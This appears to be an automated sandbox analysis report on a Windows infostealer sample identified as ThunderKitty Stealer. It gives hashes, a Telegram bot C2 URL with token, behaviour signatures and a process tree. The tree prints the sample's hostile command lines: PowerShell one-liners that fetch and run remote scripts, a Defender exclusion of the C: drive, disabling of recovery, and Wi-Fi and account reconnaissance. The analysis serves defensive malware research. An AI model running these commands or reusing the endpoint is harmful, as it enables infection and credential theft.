Analysis
max time kernel: 156s
max time network: 156s
platform: windows11-21h2_x64
resource: win11-20240802-en
resource tags: arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 13/08/2024, 22:42
Behavioral task: behavioral1
Sample: Chameleon-Byfronpatch2.exe
Resource: win11-20240802-en
General
Target: Chameleon-Byfronpatch2.exe
Size: 9.2MB
MD5: addbf6301c1ea797554a0152da23d5ae
SHA1: 01a22ed2bb77ff84546147098348a07bc0eecbc6
SHA256: 585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb
SHA512: 9507a56c571d1f9ddf67dd9b5200c340416b00bb956c52fa88b8cd2108d5f789cdf5c04d60aa06c5c9bde8bec2e6a324c89435eec57708e1f66fd0a98c767a11
SSDEEP: 98304:NLTHcOdLkG6nUDvQlPU68hkY8LdYwTE/zTPy2R0r:mOdLkG9TChA/zLc
Malware Config
Extracted
Family: thunderkittystealer
C2: https://api.telegram.org/bot7313166053:AAHuGOvyp2uwh4XDuUaFOzKqdwz2pEZCs_o/sendMessage?chat_id=-4242365683
Signatures

ThunderKitty Stealer
ThunderKitty Stealer is an open-source stealer written in Golang.

Credentials from Password Stores: Credentials from Web Browsers (1 TTPs)
Malicious Access or copy of Web Browser Credential store.

Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.

Blocklisted process makes network request (4 IoCs)
flow | pid | Process
7 | 5776 | powershell.exe
8 | 2012 | powershell.exe
37 | 5128 | powershell.exe
38 | 1904 | powershell.exe

pid | Process
2012 | powershell.exe
5128 | powershell.exe
1904 | powershell.exe
5776 | powershell.exe
4188 | powershell.exe
4656 | powershell.exe

Downloads MZ/PE file
Drops file in Drivers directory (2 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\Drivers\etc\hosts | Chameleon-Byfronpatch2.exe
File opened for modification | C:\Windows\System32\Drivers\etc\hosts | Chameleon-Byfronpatch2.exe

Modifies Windows Firewall (2 TTPs, 2 IoCs)
pid | Process
2052 | netsh.exe
996 | netsh.exe

Executes dropped EXE (1 IoCs)
pid | Process
3056 | Chameleon-Byfronpatch2.exe

Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 6 IoCs)
flow | ioc
37 | raw.githubusercontent.com
38 | raw.githubusercontent.com
1 | raw.githubusercontent.com
4 | raw.githubusercontent.com
7 | raw.githubusercontent.com
8 | raw.githubusercontent.com

Network Service Discovery
pid | Process
5636 | ARP.EXE
3900 | ARP.EXE

Drops file in System32 directory (2 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\system32\Recovery | reagentc.exe
File opened for modification | C:\Windows\system32\Recovery\ReAgent.xml | reagentc.exe

Drops file in Windows directory (9 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\SystemTemp | chrome.exe
File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | reagentc.exe
File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | reagentc.exe
File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | reagentc.exe
File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | reagentc.exe
File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | reagentc.exe
File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | reagentc.exe
File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | reagentc.exe
File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | reagentc.exe
Subvert Trust Controls: Mark-of-the-Web Bypass (1 TTPs, 1 IoCs)
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description | ioc | Process
File opened for modification | C:\Users\Admin\Downloads\Chameleon-Byfronpatch2.exe:Zone.Identifier | chrome.exe

Event Triggered Execution: Netsh Helper DLL (1 TTPs, 18 IoCs)
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description | ioc | Process | entries
Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe | 6
Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe | 6
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | netsh.exe | 6

Permission Groups Discovery: Local Groups (1 TTPs)
Attempt to find local system groups and permission settings.

System Network Configuration Discovery: Wi-Fi Discovery (1 TTPs, 4 IoCs)
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid | Process
5812 | netsh.exe
1160 | netsh.exe
3304 | netsh.exe
4732 | netsh.exe

System Network Connections Discovery (1 TTPs, 2 IoCs)
Attempt to get a listing of network connections.
pid | Process
1492 | NETSTAT.EXE
1664 | NETSTAT.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe

Gathers network information (2 TTPs, 6 IoCs)
Uses commandline utility to view network configuration.
pid | Process
3716 | ipconfig.exe
1664 | NETSTAT.EXE
5720 | ipconfig.exe
1256 | ipconfig.exe
1492 | NETSTAT.EXE
2408 | ipconfig.exe

Modifies data under HKEY_USERS (2 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133680626352364715" | chrome.exe

Modifies registry class (1 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\MuiCache | MiniSearchHost.exe
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 | Chameleon-Byfronpatch2.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob | Chameleon-Byfronpatch2.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob | Chameleon-Byfronpatch2.exe
NTFS ADS (1 IoCs)
description | ioc | Process
File opened for modification | C:\Users\Admin\Downloads\Chameleon-Byfronpatch2.exe:Zone.Identifier | chrome.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
3348 | schtasks.exe

Suspicious behavior: EnumeratesProcesses (19 IoCs)
pid | Process | entries
4188 | powershell.exe | 2
2012 | powershell.exe | 3
5776 | powershell.exe | 2
1972 | chrome.exe | 2
5128 | powershell.exe | 3
1904 | powershell.exe | 4
4656 | powershell.exe | 3

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (7 IoCs)
pid | Process | entries
1972 | chrome.exe | 7

Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 4188 | powershell.exe
Token: SeDebugPrivilege | 5776 | powershell.exe
Token: SeDebugPrivilege | 2012 | powershell.exe
The remaining 61 entries are all for pid 2012 powershell.exe, which runs through the following token sequence three times (the third pass ends at Token: 34):
Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

Suspicious use of FindShellTrayWindow (38 IoCs)
pid | Process | entries
1972 | chrome.exe | 38

Suspicious use of SendNotifyMessage (12 IoCs)
pid | Process | entries
1972 | chrome.exe | 12

Suspicious use of SetWindowsHookEx (1 IoCs)
pid | Process
4404 | MiniSearchHost.exe

Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target | entries
PID 5300 wrote to memory of 5368 | 5300 | Chameleon-Byfronpatch2.exe | 79 | 2
PID 5300 wrote to memory of 4188 | 5300 | Chameleon-Byfronpatch2.exe | 81 | 2
PID 5300 wrote to memory of 5776 | 5300 | Chameleon-Byfronpatch2.exe | 84 | 2
PID 5300 wrote to memory of 2060 | 5300 | Chameleon-Byfronpatch2.exe | 85 | 2
PID 5300 wrote to memory of 1068 | 5300 | Chameleon-Byfronpatch2.exe | 82 | 2
PID 5300 wrote to memory of 2012 | 5300 | Chameleon-Byfronpatch2.exe | 88 | 2
PID 2060 wrote to memory of 3084 | 2060 | cmd.exe | 91 | 2
PID 2012 wrote to memory of 6068 | 2012 | powershell.exe | 92 | 2
PID 5776 wrote to memory of 5132 | 5776 | powershell.exe | 93 | 2
PID 6068 wrote to memory of 3100 | 6068 | csc.exe | 94 | 2
PID 5132 wrote to memory of 2556 | 5132 | csc.exe | 95 | 2
PID 2012 wrote to memory of 5812 | 2012 | powershell.exe | 96 | 2
PID 2012 wrote to memory of 4248 | 2012 | powershell.exe | 98 | 2
PID 4248 wrote to memory of 4436 | 4248 | net.exe | 99 | 2
PID 2012 wrote to memory of 2052 | 2012 | powershell.exe | 100 | 2
PID 2012 wrote to memory of 5880 | 2012 | powershell.exe | 101 | 2
PID 2012 wrote to memory of 4136 | 2012 | powershell.exe | 102 | 2
PID 4136 wrote to memory of 3856 | 4136 | net.exe | 103 | 2
PID 2012 wrote to memory of 1256 | 2012 | powershell.exe | 104 | 2
PID 2012 wrote to memory of 1932 | 2012 | powershell.exe | 105 | 2
PID 1932 wrote to memory of 3296 | 1932 | net.exe | 106 | 2
PID 2012 wrote to memory of 1756 | 2012 | powershell.exe | 107 | 2
PID 2012 wrote to memory of 1492 | 2012 | powershell.exe | 108 | 2
PID 2012 wrote to memory of 5228 | 2012 | powershell.exe | 109 | 2
PID 2012 wrote to memory of 2408 | 2012 | powershell.exe | 110 | 2
PID 2012 wrote to memory of 5064 | 2012 | powershell.exe | 111 | 2
PID 2012 wrote to memory of 5636 | 2012 | powershell.exe | 112 | 2
PID 2012 wrote to memory of 1160 | 2012 | powershell.exe | 113 | 2
PID 1972 wrote to memory of 1672 | 1972 | chrome.exe | 121 | 2
PID 1972 wrote to memory of 6004 | 1972 | chrome.exe | 122 | 6

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Views/modifies file attributes (1 TTPs, 2 IoCs)
pid | Process
5368 | attrib.exe
2436 | attrib.exe
Processes
Tree level in brackets; children are indented under their parent.

[1] C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe"
    PID: 5300
    - Drops file in Drivers directory
    - Suspicious use of WriteProcessMemory

    [2] C:\Windows\system32\attrib.exe
        Command line: attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
        PID: 5368
        - Views/modifies file attributes

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -C "Add-MpPreference -ExclusionPath 'C:'"
        PID: 4188
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    [2] C:\Windows\system32\reagentc.exe
        Command line: reagentc.exe /disable
        PID: 1068
        - Drops file in System32 directory
        - Drops file in Windows directory

    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
        PID: 5776
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qyn55xib\qyn55xib.cmdline"
            PID: 5132
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79B5.tmp" "c:\Users\Admin\AppData\Local\Temp\qyn55xib\CSC3F391B89505D48BBADC2C965889EB35.TMP"
                PID: 2556
    [2] C:\Windows\system32\cmd.exe
        Command line: cmd /c rundll32.exe user32.dll,SwapMouseButton
        PID: 2060
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\system32\rundll32.exe
            Command line: rundll32.exe user32.dll,SwapMouseButton
            PID: 3084
    [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
        PID: 2012
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

        [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\du4mrtky\du4mrtky.cmdline"
            PID: 6068
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79B4.tmp" "c:\Users\Admin\AppData\Local\Temp\du4mrtky\CSCB6DF2AF8DD7446C6B88FD85555F350E1.TMP"
                PID: 3100

        [3] C:\Windows\system32\netsh.exe
            Command line: "C:\Windows\system32\netsh.exe" wlan show profiles
            PID: 5812
            - Event Triggered Execution: Netsh Helper DLL
            - System Network Configuration Discovery: Wi-Fi Discovery

        [3] C:\Windows\system32\net.exe
            Command line: "C:\Windows\system32\net.exe" localgroup administrators
            PID: 4248
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\system32\net1.exe
                Command line: C:\Windows\system32\net1 localgroup administrators
                PID: 4436

        [3] C:\Windows\system32\netsh.exe
            Command line: "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
            PID: 2052
            - Modifies Windows Firewall
            - Event Triggered Execution: Netsh Helper DLL

        [3] C:\Windows\system32\whoami.exe
            Command line: "C:\Windows\system32\whoami.exe" /all
            PID: 5880

        [3] C:\Windows\system32\net.exe
            Command line: "C:\Windows\system32\net.exe" user
            PID: 4136
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\system32\net1.exe
                Command line: C:\Windows\system32\net1 user
                PID: 3856

        [3] C:\Windows\system32\ipconfig.exe
            Command line: "C:\Windows\system32\ipconfig.exe" /displaydns
            PID: 1256
            - Gathers network information

        [3] C:\Windows\system32\net.exe
            Command line: "C:\Windows\system32\net.exe" localgroup
            PID: 1932
            - Suspicious use of WriteProcessMemory

            [4] C:\Windows\system32\net1.exe
                Command line: C:\Windows\system32\net1 localgroup
                PID: 3296

        [3] C:\Windows\System32\Wbem\WMIC.exe
            Command line: "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
            PID: 1756

        [3] C:\Windows\system32\NETSTAT.EXE
            Command line: "C:\Windows\system32\NETSTAT.EXE" -ano
            PID: 1492
            - System Network Connections Discovery
            - Gathers network information

        [3] C:\Windows\System32\Wbem\WMIC.exe
            Command line: "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
            PID: 5228

        [3] C:\Windows\system32\ipconfig.exe
            Command line: "C:\Windows\system32\ipconfig.exe" /all
            PID: 2408
            - Gathers network information

        [3] C:\Windows\system32\ROUTE.EXE
            Command line: "C:\Windows\system32\ROUTE.EXE" print
            PID: 5064

        [3] C:\Windows\system32\ARP.EXE
            Command line: "C:\Windows\system32\ARP.EXE" -a
            PID: 5636
            - Network Service Discovery

        [3] C:\Windows\system32\netsh.exe
            Command line: "C:\Windows\system32\netsh.exe" wlan show profile
            PID: 1160
            - Event Triggered Execution: Netsh Helper DLL
            - System Network Configuration Discovery: Wi-Fi Discovery
[1] C:\Windows\System32\rundll32.exe
    Command line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
    PID: 1904
[1] C:\Program Files\Google\Chrome\Application\chrome.exe
    Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe"
    PID: 1972
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory

    [2] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd4533cc40,0x7ffd4533cc4c,0x7ffd4533cc58
        PID: 1672

    [2] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,12751129568930905186,8912711076065210017,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1820 /prefetch:2
        PID: 6004

    [2] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2100,i,12751129568930905186,8912711076065210017,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2112 /prefetch:3
        PID: 5948

    [2] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,12751129568930905186,8912711076065210017,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2204 /prefetch:8
        PID: 5396

    [2] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3128,i,12751129568930905186,8912711076065210017,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3260 /prefetch:1
        PID: 1384

    [2] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,12751129568930905186,8912711076065210017,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3296 /prefetch:1
        PID: 5992

    [2] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4476,i,12751129568930905186,8912711076065210017,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3588 /prefetch:1
        PID: 2556

    [2] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4320,i,12751129568930905186,8912711076065210017,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4736 /prefetch:8
        PID: 4576

    [2] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,12751129568930905186,8912711076065210017,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4804 /prefetch:8
        PID: 4592

    [2] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4404,i,12751129568930905186,8912711076065210017,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4804 /prefetch:1
        PID: 1692

    [2] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3564,i,12751129568930905186,8912711076065210017,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3592 /prefetch:1
        PID: 5932

    [2] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5036,i,12751129568930905186,8912711076065210017,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3380 /prefetch:1
        PID: 2808

    [2] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3212,i,12751129568930905186,8912711076065210017,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3436 /prefetch:1
        PID: 2888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4312,i,12751129568930905186,8912711076065210017,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5272 /prefetch:82⤵PID:2852
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5280,i,12751129568930905186,8912711076065210017,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5384 /prefetch:82⤵PID:5316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3812,i,12751129568930905186,8912711076065210017,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5404 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:5192
-
-
  C:\Users\Admin\Downloads\Chameleon-Byfronpatch2.exe  (PID 3056)
    "C:\Users\Admin\Downloads\Chameleon-Byfronpatch2.exe"
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Modifies system certificate store

    C:\Windows\system32\attrib.exe  (PID 2436)
      attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
      - Views/modifies file attributes

    C:\Windows\system32\reagentc.exe  (PID 5564)
      reagentc.exe /disable
      - Drops file in Windows directory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 4656)
      powershell -C "Add-MpPreference -ExclusionPath 'C:'"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 5128)
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses

      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (PID 4400)
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oye3hhbo\oye3hhbo.cmdline"

        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (PID 5812)
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3771.tmp" "c:\Users\Admin\AppData\Local\Temp\oye3hhbo\CSCBA22CD5693FD49A18F1F4E1E5DF6F691.TMP"

    C:\Windows\system32\cmd.exe  (PID 3640)
      cmd /c rundll32.exe user32.dll,SwapMouseButton

      C:\Windows\system32\rundll32.exe  (PID 5172)
        rundll32.exe user32.dll,SwapMouseButton

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1904)
      powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses

      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (PID 1992)
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a3ptejjm\a3ptejjm.cmdline"

        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (PID 1404)
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3752.tmp" "c:\Users\Admin\AppData\Local\Temp\a3ptejjm\CSC263BFD386B2A423A8A391CB1BDDA37D.TMP"

      C:\Windows\system32\netsh.exe  (PID 3304)
        "C:\Windows\system32\netsh.exe" wlan show profiles
        - Event Triggered Execution: Netsh Helper DLL
        - System Network Configuration Discovery: Wi-Fi Discovery

      C:\Windows\system32\net.exe  (PID 2168)
        "C:\Windows\system32\net.exe" localgroup administrators

        C:\Windows\system32\net1.exe  (PID 3660)
          C:\Windows\system32\net1 localgroup administrators

      C:\Windows\system32\netsh.exe  (PID 996)
        "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
        - Modifies Windows Firewall
        - Event Triggered Execution: Netsh Helper DLL

      C:\Windows\system32\whoami.exe  (PID 5816)
        "C:\Windows\system32\whoami.exe" /all

      C:\Windows\system32\net.exe  (PID 1124)
        "C:\Windows\system32\net.exe" user

        C:\Windows\system32\net1.exe  (PID 5228)
          C:\Windows\system32\net1 user

      C:\Windows\system32\ipconfig.exe  (PID 3716)
        "C:\Windows\system32\ipconfig.exe" /displaydns
        - Gathers network information

      C:\Windows\system32\net.exe  (PID 4412)
        "C:\Windows\system32\net.exe" localgroup

        C:\Windows\system32\net1.exe  (PID 4476)
          C:\Windows\system32\net1 localgroup

      C:\Windows\System32\Wbem\WMIC.exe  (PID 4644)
